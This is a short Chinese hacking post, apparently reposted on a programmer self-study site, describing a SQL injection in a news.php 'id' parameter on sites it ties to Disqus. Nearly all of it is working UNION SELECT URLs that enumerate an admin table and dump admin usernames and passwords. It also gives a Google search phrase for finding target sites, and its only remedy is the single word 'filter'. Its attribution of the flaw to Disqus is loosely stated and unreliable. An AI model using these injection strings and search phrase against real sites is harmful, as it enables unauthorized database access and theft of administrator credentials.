Disqus是世界著名的实时评论系统,如果对其不了解,可以自己Google一下
转载请注明来自:Silic Group Hacker Army首发
好吧,其实这漏洞太弱了
其实就是news.php对id值没过滤。看实例吧:
http://www.2cto.com /news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646d696e
http://www.2cto.com /news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+name0988b,0x5f,pass0988a),6,7,8+from+admin
测试方法就是: Disqus_site_url/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+name0988b,0x5f,pass0988a),6,7,8+from+admin
Google关键字自己找就好了, 下面有个: blog comments powered by Disqus
修复就是:过滤
查看更多关于著名实时评论系统Disqus SQL注入漏洞及修复 - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11418